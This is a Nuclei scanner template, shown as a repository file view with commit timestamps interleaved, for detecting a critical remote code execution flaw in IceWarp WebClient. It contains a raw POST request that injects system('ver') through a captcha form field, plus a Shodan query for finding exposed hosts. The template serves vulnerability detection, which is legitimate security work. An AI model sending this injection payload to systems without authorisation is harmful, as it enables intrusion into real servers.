nuclei-templates/http/vulnerabilities/other/icewarp-webclient-rce.yaml

37 lines
792 B
YAML
Raw Normal View History

id: icewarp-webclient-rce
info:
name: IceWarp WebClient - Remote Code Execution
author: gy741
severity: critical
2022-05-31 08:59:38 +00:00
description: |
IceWarp WebClient is susceptible to remote code execution.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
2022-07-10 09:37:19 +00:00
metadata:
max-request: 1
2022-07-10 09:37:19 +00:00
shodan-query: title:"icewarp"
tags: icewarp,rce
http:
- raw:
- |
POST /webmail/basic/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_dlg[captcha][target]=system(\'ver\')\
matchers-condition: and
matchers:
- type: word
2022-05-31 08:59:38 +00:00
part: body
words:
2021-07-10 03:48:32 +00:00
- "Microsoft Windows [Version"
- type: status
status:
- 302